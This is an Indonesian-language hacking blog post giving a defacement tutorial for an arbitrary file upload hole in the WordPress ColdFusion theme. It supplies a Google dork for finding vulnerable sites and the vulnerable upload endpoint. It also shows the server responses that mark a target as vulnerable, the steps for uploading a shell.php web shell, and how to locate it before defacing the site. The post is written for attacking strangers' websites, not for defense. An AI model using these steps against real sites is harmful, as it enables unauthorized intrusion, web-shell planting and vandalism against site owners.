exploit wordpress arbitary coldfusion file upload vulnerability

hay guys :v ketemu lagi neh sama cakil :v
kali ini cakil akan share tutorial deface arbitrary wp-ColdFusion file upload

cekidot guys :)
dork:inurl:/wp-content/themes/ColdFusion/
(kembangin)
exploit : /wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
1.masukan dork di google
2.cari target
3.masukan xploit nya
contoh
http://localhost/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
4.vuln ?
{"status":"NOK", "ERR":"This file is incorect"}

(liat gambar)
5.buka csrf nya : sini gan
6.simpen dengan extensi html
7. vuln ?
{"status":"OK","imageID":"shellphp","imageName":"shell.php","html":"\n\t\n\t\t

(liat gambar gan)
8.akses file ?
ctrl-u gan
nanti akan terlihat seperti ini

http:\/\/localhost\/wp-content\/uploads\/settingsimages\/shell.php\

(liat gambar)
9.tinggal tebas deh kwkwkkw :v
gampang kan :v ok sekian dan terima kasih
saran or kritik monggo :)

exploit wordpress arbitary coldfusion file upload vulnerability

0 Comments

Facebook

Main Labels

Categories

sitemap

Search This Blog

Popular Posts

Mengetahui IP Asli Dari website Yang Terpasang Cloudfire

How To Sniff Username And Password With Wireshark

Tutorial Inject Backdoor Android Application (Metasploit)

Tags

Menu Footer Widget

exploit wordpress arbitary coldfusion file upload vulnerability

You may like these posts

0 Comments

Follow Us

Facebook

Main Labels

Categories

sitemap

Search This Blog

Popular Posts

Mengetahui IP Asli Dari website Yang Terpasang Cloudfire

How To Sniff Username And Password With Wireshark

Tutorial Inject Backdoor Android Application (Metasploit)

Tags

Menu Footer Widget